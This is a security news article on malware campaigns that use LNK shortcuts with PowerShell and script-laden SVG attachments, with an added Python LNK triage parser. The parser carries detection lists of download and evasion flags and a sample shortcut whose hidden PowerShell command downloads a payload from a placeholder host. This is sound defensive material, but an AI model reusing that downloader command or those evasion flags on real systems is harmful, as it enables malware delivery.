Cybercriminals Switch File Types to Infect More Organizations with Malware

During the past year, spam volume increased considerably, as did the percentage of those emails that were malicious. The increase in malicious messages coincided with increased botnet activity. Botnets are now being used to send large-scale malware and ransomware campaigns. While spam email delivery of malware may have fallen out of favor in recent years, that is clearly no longer the case.

During 2016, cybercriminals favored malicious Office macros and JavaScript for downloading their malicious payloads. However, the Microsoft Malware Protection Center has identified a new trend. Rather than JavaScript, which is becoming easier to identify and block, cybercriminals have turned to less suspicious-looking file types to infect end users.

Large-scale spamming campaigns are now being conducted that distribute malicious LNK and SVG files. These files are less likely to arouse suspicions than JavaScript and may make it past anti-spam defenses. LNK files – Windows shortcut files – are combined with PowerShell scripts which download malicious payloads when opened. Over the past year, PowerShell scripts have been used to download ransomware variants such as Locky.

Microsoft’s Malware Protection Center has identified one campaign that uses LNK files that attempt to download Locky from five different domains. “The use of multiple domains and the technique of storing the rest of the URL as a parameter is a way to circumvent URL filtering solutions. All the script needs is one URL that is not blocked in order to successfully download malware,” warns Microsoft.
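The shortcut files described above carry their PowerShell command line in the LNK file itself, so a mail gateway or analyst can inspect it without opening the file. The following added example (not code from the article or from Microsoft) parses the StringData section of the Shell Link format and flags shortcuts whose target or arguments launch PowerShell with a URL, a hidden window or an execution-policy bypass. The `build_sample_lnk` helper, the `example.invalid` URL and the marker lists are constructed for this example; real shortcuts also contain an IDList and LinkInfo block, which the parser skips by size.

```python
import struct

# Layout constants from the MS-SHLLINK ShellLinkHeader and LinkFlags fields.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Constructed marker lists for this example; tune them to your own environment.
URL_MARKERS = ("http://", "https://", "downloadstring", "downloadfile", "invoke-webrequest")
EVASION_MARKERS = ("-windowstyle hidden", "-w hidden", "-encodedcommand", "-enc ", "bypass")


def parse_lnk_strings(data):
    """Return the StringData fields of a Shell Link as a dict.
    Raises ValueError when the header size or CLSID does not match."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 0x4C  # end of the fixed-size header
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (4 bytes) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("latin-1")
            pos += count
    return fields


def assess_lnk(data):
    """Classify a shortcut: suspicious when it launches PowerShell and its
    arguments also show a download, hidden window or policy bypass."""
    fields = parse_lnk_strings(data)
    launch = (fields.get("relative_path", "") + " " + fields.get("working_dir", "")).lower()
    args = fields.get("arguments", "").lower()
    reasons = []
    if "powershell" in launch or "powershell" in args:
        reasons.append("launches PowerShell")
    if any(m in args for m in URL_MARKERS):
        reasons.append("arguments reference a download or URL")
    if any(m in args for m in EVASION_MARKERS):
        reasons.append("arguments hide the window or bypass execution policy")
    return {"fields": fields, "reasons": reasons,
            "suspicious": "launches PowerShell" in reasons and len(reasons) > 1}


def build_sample_lnk(relative_path, arguments=None):
    """Constructed minimal LNK for testing: header + RELATIVE_PATH (+ arguments).
    Omits the IDList and LinkInfo blocks that real shortcuts carry."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))  # attributes, timestamps, size, icon, show, hotkey, reserved

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path)
    if arguments is not None:
        body += string_data(arguments)
    return header + body


if __name__ == "__main__":
    # Constructed samples: a PowerShell downloader shortcut and a plain document shortcut.
    downloader = build_sample_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                                  '-NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest http://example.invalid/payload"')
    document = build_sample_lnk(r"..\Documents\report.docx")
    for sample in (downloader, document):
        print(assess_lnk(sample))
```

The parser only walks as far as the StringData block, which is enough to see the command line; it does not follow the Extra Data section. Because the marker match is a simple substring test, the result is a triage signal for quarantine or analyst review rather than a verdict on its own.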

Not all campaigns are used to download malicious files. Fileless malware is becoming more popular. Since PowerShell scripts are run directly in memory, no file download is necessary; the malicious code remains in memory. Even if endpoint security has been implemented, those solutions are unlikely to detect these fileless malware attacks.

Organizations can improve defenses against these fileless malware attacks by setting PowerShell execution policies to restricted, but it is relatively easy to bypass these security policies and still run the scripts.

SVG – Scalable Vector Graphics – files are image files; however, it is relatively easy to incorporate obfuscated JavaScript into the files. Opening the file attachment will launch the JavaScript, which in turn will download the malware or ransomware. SVG files are opened using browsers, and the image will be displayed even if JavaScript has been incorporated into the file. End users who open these files are therefore unlikely to realize that malware is being silently downloaded.

Many organizations have responded to the threat of JavaScript downloaders by blocking their delivery through their spam filtering solutions. The change to PowerShell scripts could potentially see spam controls bypassed. To deal with the threat, organizations should also configure their spam filtering solutions to block LNK files. Since these file types are rarely sent in legitimate emails, blocking LNK files is unlikely to cause any problems.

SVG files are more commonly used, although organizations should consider also blocking these image types from delivery via email. If images do need to be sent, policies can be developed to require these file types to be communicated via other means, via Google Drive or Dropbox for example.

Author: Steve Alder has many years of experience as a journalist, and comes from a background in market research. He is a specialist on legal and regulatory affairs, and has several years of experience writing about HIPAA. Steve holds a B.Sc. from the University of Liverpool.